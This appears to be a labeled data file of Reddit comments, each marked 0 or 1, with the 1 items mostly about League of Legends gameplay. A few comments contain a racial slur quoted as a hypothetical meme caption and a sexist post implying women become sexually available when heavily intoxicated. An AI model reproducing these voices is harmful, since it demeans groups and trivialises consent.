0	I already explained why I mentioned tech.  I don't really take people seriously if they're afraid of technology; people who are afraid of the internet specifically and mistrust it because of technophobia exist and if that's their motivation for saying "don't believe Wiki," I immediately dismiss their points.  I don't care to further elaborate for you. But why are you so hung up on the tech point anyway?  If it makes you feel better, I'll retract it. I don't really care and it's not the main point I was making.   "There  is  false information on the internet." Well...yeah, duh.  But this constant and universal assault on the accuracy of info on the internet is the tech/info literacy equivalent of telling kids they'll get the aids-bola virus if they're so much as naked in the same room with a person of the opposite sex.  Just don't be an idiot, use reasonable sites, and cross-check references and you should be fine.   Really, this issue applies pretty much anywhere you get your information.  I've found just as many fallacious articles published in  Nature / Science  as I have on Wiki (in science articles I mean, of course).  Look, my  job  involves constantly parsing information on the internet.  You're making quite the assumptions here: 1) That I blindly trust technology. 2) That I think this issue is a matter of technology. 3) That I don't think authority is important.  Who do you think writes the articles on, say, renormalization, hrmmm?  Do you even know what that is?  Know who knows what that is?  Figures of authority.  Crowdsourcing is terrible for some things; for others it's amazing.   Since we're tossing in unfounded ad hominem attacks in here, there should be a word for people like you who seem to be predisposed to  not  believe things on the internet.  I know plenty of them.   You've actually weakened your argue by demonstrating that you're far more likely to make presumptions about the nature of something than you're claiming I am.  You've lost focus of the main point, misdiagnosed my perspective, and been patronizing while telling me nothing I don't already know.  I'm quite done here.
1	Kotaku conveniently left out the fact this is an Asian league. Let's be honest, Asia isn't a bastion of LGBT rights. Their title says:   >Only One LGBTQ Person Allowed Per Team In League Of Legends Tournament   Slightly misleading. Considering the readers are probably only familiar with LCS.   >Only One LGBTQ Person Allowed Per Team In Asian League Of Legends Tournament   One word changes quite a bit. This tells us that it's not LCS. Yeah, it's not right but it's ASIA not the US.   Human Rights Watch summary of Singapore in 2014: >Singapore's government further restricted freedom of expression and assembly in 2014, and turned back gains in lesbian, gay, bisexual and transgender (LGBT) rights.   Is it really, really shocking that there's discrimination? No, well maybe if you assume this is occurring in the states as the title misleads you to believe. Just the region is behind us on LGBT acceptance...
1	Actually the minority of LOL players are chat restricted and even less are banned. So does that make the majority of us not "only human?"   OMG hold on.
0	try being at a place where most of the docs are computer illiterate.  And now most hospitals are moving to electronic medical records.  I rotated with a doc who didnt know how to use the scroll wheel.  Worse, he was a radiologist.  So when he viewed CT scans he would click through each image.  And each CT scan contains about 50-60 images per angle and 3 angles.  So yeah, that took a while.  Now do that with multiple CT scans and you got yourself a long day.
1	Leaguepedia.com/wiki/Team_Solo_Mid   Leaguepedia.com/wiki/bischu
0	Well im screwed. Im about to go deposit $4 dollars in my account so i can buy a whole $10 worth of gas with my card because i only have like $9 total in it. And i need all the gas i can get since my car estimates i only have 7miles left (keeping in mind that one gallon gets me 33.8 miles). So i really need gas to last me until Thursday. And mathematically, im fucked. $10 is going to get me about 3 gallons, which is roughly 100 miles (i drive about 40 of actual distance daily(but with LA traffic i used up about 50miles worth)) which by Thursday is going to leave me with maybe (if im lucky) 10miles worth which is less than a gallon again. It's gonna be close.
0	Basically what you've told us is that you buy Brisk more, and then afterwards you buy Arizona.
1	Well, the counterplay to him is that you don't let him free-farm.   Even if you aren't playing a lane bully, it is on your jungler to be camping top and preventing Nasus from farming until you are so far ahead you can just keep bullying him out of lane.   Not only does that set his Q behind by a few hundred stacks, but is also just prevents him from becoming tanky. Nasus relies heavily on items, and is super squishy without them.   *
0	Thanks for the correction, I was not aware of that. The only way I could find for a young employee in this situation to make a complaint is the last section from here:   "An employment policy or practice that applies to everyone, regardless of age, can be illegal if it has a negative impact on applicants or employees age 40 or older  and is not based on a reasonable factor other than age ."   Link is to the actual law and I am not about to dig through that right now :p     My example: Young employee, who is very qualified for the position,  is considered for promotion to manage a team with older people (some would have to be over 40). Company says they think he is too young to manage the older people for yada reason so they choose a less qualified older person to take the job.   The point of attack here is that by putting the less qualified person in charge the company is putting the older employees on the team at a disadvantage as the less qualified manager may not help them perform as well as they could have had the younger employee been made their manager.   Realistically, though, this is a weak argument and anecdotal but is the best chance as far as I have seen in my limited reading into the subject. I do not think this would succeed.
0	Kids are kids.  It's easy to look back and be like "ya know, it wasn't that bad."  They don't have that hindsight or those learning experiences yet.  That's part of growing up, and unfortunately some of them don't make it past that part.  When you're a teenager, things seem a lot more extreme than they really are and the issues you might face at school may very well be your biggest problems in life.  A child in a third world country is worrying if they'll get water today.  A billionaire in New York can't decide where to fly for lunch tomorrow.  And a kid in a hallway at school is dreading the rest of his day because his bully is at the other end.   I kind of went off track there...
1	People dont even know what trolls means.   It is troll to fking base to get full itemsß eh..no? Its not wise(bot in 99% of the game sit doesnt matter) but troll? gosh.. And ofc is NB salty.   You guys shouldnt act that someone os either a torll or the other salty, it can be two at once,you know?   But hey,to clarify: Would you report someone because he based to get full items instead of finishing? Would you do it because you believ eits "the right thing" or because youre salty that you lost,because someone didnt wanted to finisbh? Yeah right.
1	Wall of text inc.   I like how some people (such as you) are so eager to listen to the words of one or two alleged pros and twist it into "you belong at your elo, get better at the game".   Maybe its a way for more noobs who arent as high as some others to feel better about themselves when talking about things like clamping. And i think everyone already knows the infamous "solo que is all about solo carrying and being better" line but people who actually think about the game for themselves are more inclined to disagree with the systems, and are the only ones who actually make and suggest changes to improve the game, not the ones who just agree with everything riot does.   On that topic, clamping was never an issue in S2, and its actually a very different change thats arguably imbalanced and certainly different from the older system. I personally think its pretty shitty that someone who wins ten games in a row but is clamped can get 0-5 LP and yet instantly others will say "youre clamped because youre not good enough".   Penalizing a player with lp clamping who is on the consistent rise in terms of win loss ratio (pretty much the only real solid statistic to gauge skill and determine elo) due to a double system of lp and mmr is only a problem because the problem exists. And of course i know clamping goes away over time if you are winning, but lets be honest. Making someone play tens of matches in excess when others dont is in need of a fix.   Anoter example, placement matches make it so for example you can have a player with 50 wins 60 losses place in silver 1, but also have a player with 60 wins 50 losses in silver 2. The sheer amount of games won over in such similiar mmr/elo range in comparison, seems very imbalanced for the player who won more and didnt face any weaker opponents getting there.   And dont even get me started on duo que, smurfs, or permanent league placement.
0	Also, I make jokes about killing babies in violent ways and think they're funny. I don't actually have anything against babies (at their best they can be very tasty), but it's a certain type of humor. Making jokes about something is not the same as condoning it, when people do it tends to be apparent as the jokes contain an edge to them. Joking about race and racism is not my thing, but to play on racial stereotypes can be the same as playing on any other. All stereotypes are unfair, and for me that is where they derive their humor. If I though all blondes were stupid, I wouldn't laugh at the jokes, because I'm not a malicious person, but that stereotype is funny and universal.   The Almost Politically Correct Redneck is clearly playing mostly on the negative stereotype of the redneck, turning it on its head. It goes from a good premise to a bad one, the butt of the joke being the second line. I read it as the redneck having good intentions, yet he can't escape that he's a redneck - he comes from a different subculture. The joke is much the same as those about wiggers. They want to be rappers and gangster, yet come from well furnished middle class homes and hence fail. The wigger is naive and the APCR is naive. Now, ask yourself if this would be a funny APCR caption:   "Save women"   "Kill niggers"   It wouldn't for me, because the intent is malicious and it sounds to me like the creator of such a meme might be serious with his second line. It's unneccesarily violent. Now compare the caption above to [this]( The tone, wording and intention is everything to this meme.
1	All of the comments here are pointing out the right and wrongs of leaving, I say let the team decide.   What about that one player that thinks a 4v5 team could still win the game, should he get punished for that 20% of a chance?   The current surrender vote system might be a little rusty but it provide a good estimation about the willing of one team to keep playing, even with less than 5 people   Imo, the change that should be happening is that if one player leaves( for a 2-5 minutes) during the 0-20 minutes time frame, team surrendering should be available.
1	It's not awful. If you play a style where you shield yourself more than the AD, it can work. Because you shield yourself, you have more ad to last hit and can go aggro.   Honestly it'd work in lower elos, where you might not be confident to play some of the skill based matchups Janna is supposed to win. (Leona, and Naut.) You'll die less, and provide slightly better sustain with well placed shields and relic.   However, it requires you manage your mana. Starting 3/1 or 2/2 Hp/Mana pots will probably be best. ( I'd try out 3/1 first.)   Also, you will probably have to practice last hitting if you suck at it. Don't expect to get every last hit. Go for the CS your AD is not going to get. And if you miss a cannon, it sucks.
1	You are completely right looc. Build mostly cooldown and damage, and let his natural spamming abilities raise his AS.  You will shred anything close to you.   And due to building like this, his mobility is amazing.  Just keep your Q coming in between auto attacks and you can almost always escape anything but the most extreme ganks.
0	I teach GED to a vast array of young adults. We have just about every race in our student body. The race of the student matters far less than whether they were raised in (my term) ghetto culture. The entitled attitude, the resistance to education and authority, the lack of ethics and morals and the desire to take advantage of society and others is present in students of every race. Conversely, a grateful attitude and a desire to be respectable and educated is also easy to find in students of every race. How you're raised matters a whole lot more than your complexion.
0	Women annoy me with the whole keeping guys as friends and acting oblivious to this fact. I tried to explain to my fiance that guys have girls in 3 buckets.. 1) girls they want to bang .. 2) girls they want to bang and date ..3) girls they would never bang   girls in bucket #3 typically aren't very attractive or are by society's standards attractive but have done something to cause the guy to lose sexual attraction to ie) he witnessed her shit on her hands or something   so unless you are ugly or have done something disgusting infront of your "guy friend" you are in either bucket 1) or bucket 2) either way if given the chance he would bang you..   any guy that says he genuinely has a girl as a friend that isn't ugly and he hasn't considered having sex with her or would turn it down is either gay.. or gay   nice guys wait their turn for buckets 1 & 2.. assholes push their way into buckets 1 & 2 and all guys have girls in bucket 3 that could potentially shift over to bucket 1.. by being heavily intoxicated   we are males.. we are designed to have sexy times yes.. so keep in mind ladies.. if you are single and you aren't ugly.. and you have a guy friend.. try and figure out if you are bucket 1 or bucket 2.. and if you are bucket 2.. and he is a nice guy.. do him a favor and help him out of the friendzone
0	If you are pursuing just the logic of this statement you are absolutely 100% true. But I think you are missing the point of the morality of this statement. If you are fighting for equality, wouldn't you want establish at least 50% of your own economic security? I think it's a bit immoral to completely rely on another individual for support and think that, that is ok.   Also, look at the double-standard of the situation: A man that works for men's rights, all while having a rich woman support him, undermines his morality.
1	Another thing to note blueboybob, is that League of Legends is going to be coming out with one of their biggest updates since the game was released as a closed beta, its a whole new game mode with a whole different type of strategy involved.   I had seen previously you asked about the length of games, and even though the traditional map Summoner's Rift (5v5) can take anywhere from 20 minutes (surrender) to 80 minutes (the longest I've ever played) this new game mode averages around 20 minutes of explosively action packed gameplay. This new mode is called Dominion, and I'll post some helpful links in a second. Basically, if you are familiar with Call of Duty games where you play Domination, you capture 5 point on the map with your champion, and the longer you hold these points for, and the more you control, the faster your enemy teams points fall. When your enemy team's points hit 0, you win. This game mode is something revolutionary to the MOBA genre, and you'll basically be around as it sprouts.   Things to note about Dominion:     Brand New Map   Brand New Game Mode   New Items   Instead of starting at level 1 in game, you start at level 3 (max level is 18)   New buffs (special  upgrades  in game such as speed boost or more damage)
0	I used to live on a very busy road in up in the mountains of North Carolina. It was a guarantee that every time it snowed, the plows would make a 2-3 foot wall in front of my drive way. There was no possible way for me or my room mates to get out, so we went out with shovels and started digging away.   Not 30 minutes into our dig, a company pickup with a plow on the front stops, honks at us to get out of the way, and then proceeds to push his plow right through the wall. He then waves, backs up, and leaves.   This happened EVERY TIME it snowed. We never worried about moving the snow, because people in the mountains get it. We even had to shovel our car out once because it was stuck in ice. Sure enough, someone with a chain stopped and pulled us out.
0	I completely understand your viewpoint and I agree that having good movie watching etiquette makes the experience better for everyone. What I'm specifically responding to is the way you expressed your point when you said   >get a girlfriend who's more mature than an 8 year old.   and   >most of the guys in this thread look like they're dating children.   The point I was making when I responded initially is that while everyone in this thread is complaining about their partner's movie watching etiquette, they're still with that person so it's obviously not a dealbreaker for them. Everyone has a few obnoxious behaviors, and so will whoever you end up with. It doesn't necessarily mean that they're less mature than an eight year old or that they act like children all the time.   Further, I think everyone is just venting in this thread and that it's not as drastic as having to find someone completely new. I think the real immature action here is having these problems and not voicing them to your partner if they bother you so much. Anyone will tell you, communication is the most important thing in a relationship, and if you don't tell your partner when they're stepping on your feet then they probably aren't going to just magically know.
1	I started playing instantly so I dropped to 900 elo but after that I started learning more about the game and I started to climb. Even if a lot of people's gonna say that you shouldn't play ranked when you hit 30 instantly because you will ruin the fun for others however if you try to learn from every game you will reach your goal in no time.
1	Reason people despise Teemo is that he has a bad kit for whenever he's shut down and Teemo's are usually not very good teamplayers. You can state a pro player had an 87% win rate but I had a 92.8% win rate (16-1) with vlad back when I was still silver. Whenever Teemo gets shut down he doesn't really contribute anything to the team anymore while he doesn't really get huge bonus early damage to make up for that.   I think Renek is a stronger laner than Teemo overal, however even Renek gets a great armor pen ability and high ult base damage which still lets you be usefull even when you have no money to buy damage and are just forced to go warmogs/sunfire.
1	my absolute worst throw was with WarWick.   We were all about level 14, and I had a full core build with WarWick. I had my team push mid and I started soloing baron. Had to down to about 2k hp and enemy Jax comes and finds me at 1/4 hp. Freaked out so hard I smited it down to like 200hp, and died. Went from a pretty great game to 4v5 teamfight and free baron.
1	Well please don't write about the bot lane if you don't play it often... Almost every ADC does quite well with leona. In fact leona is probbably the strongest support to duel cause of her passive that is almost unable to trade with. And caitlyn is not even close to being passive... Caitlyn is an amaizing early and late game ADC cause of her range and the e that can reposition her a lot. But her mid game is probbably the worst of all ADC-s cause she is quite unable to escape any lock downs. Usually the problem, specially in low ELOs are leonas because they are a way too greddy and are just waiting to e all the time.
1	There are times when you can win in CS and even get a couple of kills in your lane and be ahead.. but your side lanes start feeding as if there is no tomorrow.. There are some games that might be just unwinnable, nevertheless, there are a couple of things I usually try to do, to bring my "good lane phase" to aid the rest of my team mates.     Destroy the enemy jungler: You mention you main lux, after Gragas, I think Lux is the best champ to attempt steals (drags, buffs, baron). If you succeed, you do not only put their jungler behind, but also your jungler ahead since he can take more buffs from your team's jungler. Ward the bush from blue buff (in case they drag it there), and when you realize they are taking, move to your wraith's camp (unless you know it is warded, going to their banana bush is another option). If you see he will give the buff to the enemy's mid laner, attempt a steal. If he is taking it, attempt the kill. Invite your jungler to come, I usually rather do this as it is safer for other mid laners that don't have a long distance nuke.     Ward their wraiths, it is common, specially in low elo, that the enemy jungler does wraiths with low hp, because they are easy. Punish him, kill him.     Once the jungler is behind, counter jungle him, this is not necessary an exclusive task of your jungler.     Take tower (sometimes this takes longer with any ap champ, if your jungler doesn't come).     After you take the tower (or even before, if the situation arises), roam. TOP lane is usually gankable lane.     Sometimes it happens that you are winning your lane, and your opposition starts buying MR to counter you. At the same time, the enemy's top lane has bought some armor... suggest a switch (works better at blue side since you can still get blues). If they switch too, ask your jungler for a gank, it is a long lane so ganks are easier and you can take turret afterwards.     Suggest to end the lane phase earlier if you think you are ahead and won't take a lot of advantage if you stay mid, and your sidelanes will only feed more.       That said, you don't need to do all of that. Just do what you can when you can. Practice one thing over and over until you think you're getting a better idea of what is easier to do depending on the match ups. Keep a good attitude towards your team mates.
1	Xerath's poke is on a shockingly long cooldown until he has a chance to level up W.   If he uses Locus of Power (his Siege), dodge around until he's out of it and his short speed boost is gone, and then go in for stun + splat.   When not in siege mode, Arcanopulse's range is 900, fairly easy to dodge, and fairly soft hitting.   It's cooldown is between 7 and 5 seconds without CDR>   Locus of Power is what makes Xerath strong, because it gives a ton of magic penetration and an extra 400 range.   However, it's cooldown is 20 / 16 / 12 / 8 / 4 seconds, which means that Xerath needs a lot of levels before he can start using it effectively.   Xerath's pre-six game is actually awful.   He's almost solely dependent on his ultimate to get kills via Mage Chains stuns with Q -> R -> R -> R -> Q  while in Locus of Power .   If you ever get hit with Mage Chains (his E, a pretty symbol shows up above your head) run away for three seconds, then turn around and dump on him.   It's his only CC and his only way to set up meaningful combos with his ultimate.
0	That's super common from my experiences with other people saying they have had similar occurrences. When my ex cheated on me I found out after months of feeling like something was just off between us; emotionally and physically. After a few weeks I did the stupid thing and snooped around her Facebook rather than just ending it from incompatibility. She had a message to some high school friend asking about making out the next day. Decided to confront her about it and I was obviously at fault for going through her Facebook messages.
1	So as already figured out, it does proc multiple times.   I main shyvana, and she benefits greatly from attack speed. Her q gets cooldowns per attack, her e does magic damage per attack and her ult cooldown is decreased if she autoattacks. This fact is even made more significant because her q resets the autoattack timer, and applies 2 autoattacks, so you can proc wriggles, ionic spark and wit's end at once. Therefore, on-hit effect are very nice to have on her, and so far, I get a wit's end every game. Because of the effect, ionic spark would increase her AOE even when not in ult form, and increase her overall effectiveness. On top of that, it grants some health for a little bit more tankiness.   However, shyvana gains earlygame health by buying phage, which is really a necessary item because you don't always have red buff. You don't need the health of the spark (randuins/mallet provide enough). The spark proc damage (110 magic dmg) is not really much and falls off lategame. Wit's end is a decent item too, but it is valuable all the way to absolutely lategame due to the magic resist it provides. Plus, it procs damage on every basic attack, which 1v1 would be the same or more than spark. On top of that, shyvana does not need more AOE than she already has. Jungle camps get cleared insanely fast already.   Also, you want to jump into the enemy team with your IM A DRAGON ultimate. You want more health, armour and MR to survive that. If you want to go DPS and counterjungling-style (when you are facerolling), I would get a zeal and build it into trinity force, then randuins -> atma's -> some HP item (warmogs?)
0	I'm worried about the stuff you design, because quite frankly I have assembled Ikea furniture while drunk as hell and high as shit (at the same time) and even got a hand job in the process, without a single issue.  Their furniture is easy as shit to install and the instructions are always perfect.   If you honestly have as much issues as you say, then something else is wrong and it is NOT on the Ikea side.
1	I might be in the minority on this, but (with no disrespect to his new voice actor) in many ways I prefer the old voice. It was a bit subtler, and had more of a serene, "divine" sound to it. It wasn't as "macho" or aggressive. Like he wasn't stooping to the level of his adversaries, nor trying to be "menacing" as such. (The new voice has this seething hiss to it, which feels very generically "video game badass".) And, while resonant, his old voice didn't have that super-heavy echo filter.
1	I think Riot wants to re-assign Riven from insta-gib all in AD assassin (face it, all of them were nerfed except maybe Talon) to mobile tanky thing. Sigh... They replaced the skillshot part of landing a good knockback to a reliable knockup for a tanky teamfight Riven.
1	Every single post with some fanart has "HIRE THIS MAN/WOMAN"!!   Guys, it takes a lot more to be an artist at Riot than just sketching or producing a splash for a champion. You need to be able to handle animating and modelling as well. You're also competing for a job with incumbent legends like IronStylus, who is completely irreplaceable.
0	yep!   I'll address what I see there. I'm not sure if you're quoting that entire thing like it is a bad thing, but I'm writing this assuming you are. My apologies if you aren't.   "much more likely to be bisexual"   -In my opinion, awesome. Sexuality is a spectrum, not a binary. If these people are more comfortable in their skin and able to enjoy the love of more people, that's a large bonus in my book. I personally believe that a majority of people are pansexual to a certain amount, but they block it out due to societal constraints. Again, just my opinion there.   "Had more sexual partners"   -I don't think this is a bad thing, if people are safe. There is no reason why this would be bad outside of opinion.   "were more concerned about contracting a sexually transmitted disease (STD)"   -CONCERNED being the keyword here. Good for them! This is just personal experience, but my more sexually relaxed friends have had way less STDs than my friends who seem to be a little more hesitant. If you have a lot of sex, you know to always use protection and you have the drill down. If you do not, then when you have a theoretical one-night stand for the first time, maybe protection isn't the first thing on your mind. Again, just my personal experience, but in general I see nothing wrong with being concerned about your health. That's the reasonable thing to do if you are having more sex than the average person, you should have more concern as well.   "Additionally, porn actresses were more likely to have had a problem with alcohol and to report having used 10 different types of drugs in their lifetime. They also reported more marijuana use during the past six months compared with other women."   -I bet that could be said of any actress however, and I think that has some influence on it. A problem with alcohol is unfortunate, I agree, but I think that is more likely of anyone in a creative lifestyle. And I personally see nothing wrong with marijuana use at all, so I can't say anything about that.
1	Such an incredible difference from this tournament compared to IPL. Starting thursday and spreading out the matches allowing players to actually be rested has made for some much higher calibre entertainment. IPL was a grueling day especially for curse, this is what exactly happened with CLG.Prime at IPL4.
1	Well, up until his recent exposure, it was easy to get away with a lot more things on him. For example, a lot of people didn't know Jayce's E on his hammer form did MAGIC damage. For the longest time people would build pure armor or health but would be left scratching their heads wondering why they were still getting chunked despite having high health / resistances. Having knowledge your opponent doesn't have makes it more fun for me personally.   On top of this, in ranked, he's starting to see more bans or first picks that aren't me. This does peeve me a little because like a week or two ago, the only time I really saw Jayce was me playing as him. Agree with me or not, I personally enjoyed knowing a character was already really strong before the masses started noticing it from pros. I also enjoyed disproving people who told me Jayce was a shitty pick.   Probably not a good explanation in whole to you but idk / idc.
1	The whole flaming the jungler part is so true. I'm a jungler main on EUNE, and people really don't get that I'm not the all-powerful lane savior who can turn their 0/10/0 to 20/10/10. If I get counterjungled, get caught while trying to go save a teammate, hell, if I even fail to get the kill, I get flamed, and that's really the downside of being a jungler.   Junglers really do get the pressure in this meta. We're supposed to farm, gank all three lanes, counterjungle, ward everything, build damage, build tank and get people snowballing all at the same time. Sure, that is the unconventional truth, but the reality is that nobody can do all that.   I really like jungling though. Whenever I get a lane ahead, I feel accomplished, and if the laner happens to thank me for saving them/getting a kill for them, I am really happy. For that, I'll keep on jungling 'till my League days are over.
0	Thank you. My mother suffers from both lymphedema and lipedema, disorders that encourage obesity, generate excessive swelling and deposits of fluid, and prevent any weight loss in the affected areas. ( ( Due to the extra weight she has to carry around, she no longer has any cartilage in her knees. It's bone-on-bone grinding and extremely painful. The swelled skin often splits open and bleeds, which leads to chronic cellulitis ( My mother is an active person and it depresses the hell out of her to not be able to walk as much as each year goes by. She has to use the scooters at department stores and it always bugs the hell out of me to see the looks she gets from people who judge on appearance alone.
0	Not. They haven't even tested their longest range missile, which, for the record, can barely reach Guam. North Korea is not a threat, and, if anything, they're going to have all of their governmental officials dispatched by South Korea before they can move a damn pawn.
1	Well, it all means different stuff in different companies, but for most, software engineer is a glorified term for code monkey.  The real reason: I had a PM at my first job who told me to never call myself a software developer because it sounds like you don't have a plan.   As far as the masters or PhD being worth it, that's really up to you.  For US citizens, I feel that a Masters or PhD is more about personal academic achievement than monetary gain.  Coming from other countries where competition may be more fierce (asia for example), the Masters and PhD will help get your foot in the door and may be a better value.   My advice to college students in CS is to learn what they want to focus on, then focus on it through the open source community on GitHub.  If you like Java and want to be an enterprise Java developer, try to find a fun Spring project to contribute to on GitHub.  If you want to be a UI guy, look for a JavaScript project (pref with a focus on one of the hot modules, like jQuery or ExtJS).  In short, if you want to be a programmer, then program at least 2 hours a week on projects outside of school.  I guarantee that most of your peers aren't doing that and it will give you a massive advantage.   The reason I got my first job wasn't because of achievements or accolades (I had none), but it was because I could talk about projects I worked on with passion.  Like an artist, I think all good programmer candidates should have a portfolio that they can discuss during interviews.
1	I didn't say she is bad, she is just really high skill cap champion, and not too many people outside of high level players, play her.
1	Zyra is a very strong mid lane champ, as she can effectively control the lane from a distance and push with little worry. She does a crazy amount of AoE damage, offers CC, and has an ult that can turn games around in a manner similar to that of Rumble's. Her plants can zone champions in lane, and one misstep can easily to lead to the opponent's demise (in other words, getting hit by her E). However, she is RIDICULOUSLY squishy, and is destroyed by anyone with a gap closer, burst, or silence.
1	No. This would make it difficult to stack/way too obvious if he was going for a kill ("oh hey, why is Kassadin spamming his ult on those creeps right on front of me")   Instead, Riot simply needs to make Kassadin's Q a skillshot. The rest of his kit can remain the same. It wouldn't hurt his early game too much, as most Kassadins max E now, and it would give him an actual skillcap. He would have to rely on strategic positioning with his ult in order for his Q to connect with high priority targets, as opposed to just ulting in, E q'ing someone and floating off. A big problem with Kassadin right now is how simple and 1 dimensional he is, and it really makes him a threat in solo queue because someone with no experience can just pick Kass and try not to get shit on pre-6. Because right now Kass is essentially AP Sion with a gapcloser.
1	The reason nidalees spears are so rage inducing is that they have no actual DRAWBACK. Nidalee is formed mana wise in such a way that you will likely throw 1-2 spears then cougar for the kill, The spear is way too hard to dodge at close range unless you get lucky in your timings or flash and going closer for a less damaging spear results in a pounce to the face.   However, 1v1ing a nidalee is not as impossible as trying to fight her while she spears in the time before a 5v5. Her spears have a 4 sec cd at level 5 and can over 1000 damage laughably easy once she is decently fed. Her spears have no counter play, the easiest champ to compare the spear too is either viktor or orianna, their poke can do insane damage late game too, however there are REASONS you cannot spam them unlike nidalees spear. First is the range, 1500, nuff said, can stand inside mundos arsecheeks and spam them from a mile away, second is their cooldown, once ori and viktor have used their poke they are susceptible to being all in'd by the enemy team as it is their main damage source and messes up oris attack combo. Third and lastly, Nidalee can heal through any of their damage while safely using hers repeatedly. This heal is ridiculous and late game will heal 300+ however thats not the end, your ad tank can now storm the front with his masses of extra attack speed from her heal and will shred the enemies with nidalees debuff from trap now on the enemies (all you have to do is wait until cc like caits) NO ONE else can do this as effectivley as nidalee not even the fish.
0	Its not really about what you eat its more about how much of it you eat (In regards to gaining weight, not health). I could eat a McDonald's meal everyday, but if that's the only meal i eat during the day I'm never going to gain any weight because i haven't taken in enough calories.   Where as if i eat healthy but i eat a shitload of it and never stop eating throughout the day I'm going to get fat because I'm taking in more calories then i burn.   (
1	Maybe you should read more than just the
0	About 8 years ago, the high five was struggling for life. It seemed that no one wanted to make honest-to-goodness, palm-to-palm contact with another person. The fist bump was in vogue, and still remains a viable social interaction to this day.   But, oh, how I longed for that almost supersonic crack of skin striking skin. So I took it upon myself to revive this ancient ritual of greeting and celebration.   I began high-fiving people as frequently as I could. My palms ached from the many slaps I gave to friends, family and strangers. When it became evident that the High Five was teetering on the edge of extinction, to the point where I could no longer ask for a High Five, but had to ask to "slap hands," I knew that my mission was of the highest order of nobility and selflessness.   Through my diligence and the willingness of so many people to engage in good old human contact, with complete disregard for the swine flu and SARS, the High Five has rightfully resumed its place among humanity's greatest achievements. Alongside penicillin and Auto-Tune, and the 1980s masterpiece film "Over the Top," the High Five shines as a beacon of hope for so many, once again.
0	When you are expecting one's first child, nobody knows who they are. You can be 15, or you can be 50, and I promise you that having that kid will change who you are and how you see yourself pretty damn profoundly. Having personal shit figured out before having a kid doesn't count for half as much as you think it will. I think more life experience may make the transition into parenthood easier, and your external life circumstances absolutely matter, but there is no "being prepared personally" or "knowing who you are" when having your first kid.   Becoming a parent is a totally unique experience of ecstatic crisis that makes you feel completely insane. People who have not had kids yet or who have had them so long ago look at you, think things like >At 18, does anyone really know who they are?   because we like to think that such a huge responsibility should be taken on only when we have all our shit together.   Finding your identity in the process of becoming a parent is a great thing, and the idea that "you need to know who  you  are as a person, apart from your kids" is something I have heard from far more people without kids than I have seen parents with stunted personalities. Being a parent changes you profoundly, and not in ways you would probably choose, but not in bad ways either. The idea that you should know who you are before becoming a parent speaks more of a young adult fear of loss of identity and self, and fails to do justice to the incredible amount of self discovery that occurs looking into the face of your first child for the first time, and every second, minute, and day thereafter.   source: I am a Dad who at age 27 has a 5 month old son.
0	Counterpoint hypothetical here:   Let's start with saying this law is enacted. Girls who falsely accuse of rape receive jail time/a fine/time in the corner wearing a dunce cap. So let's say an underage girl has (actually) been raped. She accuses her rapist, but doesn't have any tangible evidence it happened. It is now her word vs his.   So what happens? It goes to court of course. But while he's on trial, he starts a counter-case against  her . She tried to protect other women from further rapes, but now  she  is stuck trying to defend herself. Already physically violated, she is now at risk of losing her reputation and her freedom as well.   She may very well win this case. After all, she's innocent. But this is the same court system that already makes mistakes. Those mistakes are why we're proposing this law in the first place.   So that's kind of where we end up: This law only works if it is never brought up fraudulently. Our justice system is not made of magic. It makes mistakes. You can't fix a problem created by some of those mistakes with a solution that relies upon exactly the same system.
0	Not OP, but my story: When my son was born, I did see the gash, but it was only by chance (and not at all by choice.)   Wife went into the operating room and they had to start cutting before I could go in. The door to the room was on the "business end" of the curtain, so my first shot once inside the room was of the doctor cutting into my wife. They had to walk me around to the other side of the room to get to where I was allowed to be.   I expressed the possibility of problems upon seeing my wife cut open to the nurse before going in, and she basically had me in an arm bar (holding my upper arm near my shoulder, and by my wrist) and rushed me through. I think she had me by the arm and had leverage on me in case anything happened, but she never mentioned that being the specific reason. She also walked me basically against the wall until around the curtain. I imagine it wasn't the first time a husband had expressed the same thoughts in the same situation, so it was probably routine for them.   I still remember the operating doctor holding my son over the curtain so that we could see him and cracking a joke to relieve the tension. I don't think my wife remembers any of this, but I remember being the happiest person in the world, and scared to death all at the same time. I literally had tears of joy and fear running down my face all at once. Seeing my wife shivering on the table, and being completely out of it was very surreal (I think the nurse said her body had gone into shock due to her being awake for the surgery.) Seeing my son didn't ease my fear for my wife, but alongside it was this feeling of intense happiness. It was a very weird sensation.   I'm sorry I turned this into a wall of text. It's the first time I've actually talked about.
1	Not all smurfs are rude to newer players.I just had a sejuani game where my team(Cho,Liss,Vayne) flamed me since i didnt get dragon vs a nunu while being pushed in, helped cho in lane(with 2 ganks), defend top in a middle of a fight, or help my team defend a lost tower and all 3 die while me and annie take 2 towers.
1	I agree, without a doubt, the quotes lend the interviews a great amount of intrigue. And I feel, pre-worlds, most of us love them! It's just that what with some people not enjoying spoilers, perhaps it could be less specific. Like "Fnatic Soaz Day 2 - Thoughts on the Korean Performance... Faker living up to the hype". Obviously just a really weak, thrown together quote, but nonetheless an example of a less spoiler-centric title.   Really, none of this bothers me b/c sometimes I can't catch every game, so it's nice to get the
1	i thought yasuo was super op and ez mode, until i bought him and tried him out. boy am i terrible with him. basically it means they have a misconception about what what your champion can and cannot do.   edit: there's also a deeper level of how much skill impacts the game. half the game is knowledge and matchups and application of mechanics with your knowledge.   like take fiora vs tryndamere. early, fiora will wreck tryndamere pretty much no matter what he does. that is an unfun matchup. then they start to QQ, and eventually the rage builds up. there's also matchups like fiora vs pantheon. pantheon will faceroll fiora all day. the pantheon player beating the fiora player isn't a matter of skill. it's a matter of which toolset counters which toolset. this is where knowledge comes into play. fiora should not try to engage pantheon at all, and just farm under turret. but if the fiora is rash, she'll try to confront panth, and lose over and over again. now, the issue here is, is it fiora's fault that she will definately lose the matchup? or is it riot's poor balancing abilities? i'd say it's riot's fault for making such one sided matchups. people play league not because they want to play a team game. they play league cause they want to feel better than other players. randoming fiora into pantheon doesn't allow you to skillfully outplay panth. it's just hell. sure you can play it safe and farm underturret, but that's not fun is it? taking panth spears up your butt over and over again. now another problem i have with this matchup is that at low skill levels, the panth actually thinks he's better than fiora. which really gets me going. panth beating fiora has nothing to do with panth's skill, but rather his toolset. so this is the underlying problem with league, and why people say "that champ doesn't even take skill, noob."
0	I feel your pain brother, I just got my first tax return in 6 years, I drive all the time 50 miles one way, deal with her new 'man' trying to tell me stuff about what I'm 'doing wrong'. Get harrassing messages about CS from her when I was between jobs and so was her new 'man' so on so forth, which I'm sure you are aware!
